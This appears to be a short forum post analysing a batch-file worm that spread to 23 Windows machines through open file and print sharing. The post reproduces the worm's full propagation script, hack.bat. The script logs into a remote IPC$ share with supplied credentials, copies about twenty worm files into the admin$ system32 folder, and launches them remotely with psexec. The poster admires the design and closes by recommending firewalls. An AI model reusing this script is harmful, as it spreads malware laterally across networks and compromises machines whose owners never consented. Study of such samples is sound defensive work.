i had oppertunity to take a look at it last week. nice job of NT bat file programming. And from the looks of it, had copied itself onto 23 other machines before an AV update detected hfind.exe.

it automates the net use command and copies all of its files over to the new drive on a successful attempt. it then makes a call to psexec to start the main bat file on the remote machine and continues on it merry way. simple but very affective.

the infected machine was using an att dial-up which set itself up with file and print sharing enabled.

here's hack.bat:

net use \\%1\ipc$ %3 /u:"%2"
copy 10.BAT \\%1\admin$\system32 /y
copy hack.bat \\%1\admin$\system32 /y
copy HFind.exe \\%1\admin$\system32 /y
copy ipc.bat \\%1\admin$\system32 /y
copy IPCPass.txt \\%1\admin$\system32 /y
copy MUMA.BAT \\%1\admin$\system32 /y
copy NWIZ_.EXE \\%1\admin$\system32 /y
copy NWIZe.IN_ \\%1\admin$\system32 /y
copy pcMsg.dll \\%1\admin$\system32 /y
copy psexec.exe \\%1\admin$\system32 /y
copy RANDOM.BAT \\%1\admin$\system32 /y
copy rep.EXE \\%1\admin$\system32 /y
copy replace.bat \\%1\admin$\system32 /y
copy START.BAT \\%1\admin$\system32 /y
copy tihuan.txt \\%1\admin$\system32 /y
copy space.txt \\%1\admin$\system32 /y
copy NEAR.BAT \\%1\admin$\system32 /y
copy ntservice.exe \\%1\admin$\system32 /y
copy NTService.ini \\%1\admin$\system32 /y
copy ntservice.bat \\%1\admin$\system32 /y
copy SS.bat \\%1\admin$\system32 /y
start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat

firewalls, firewalls, firewalls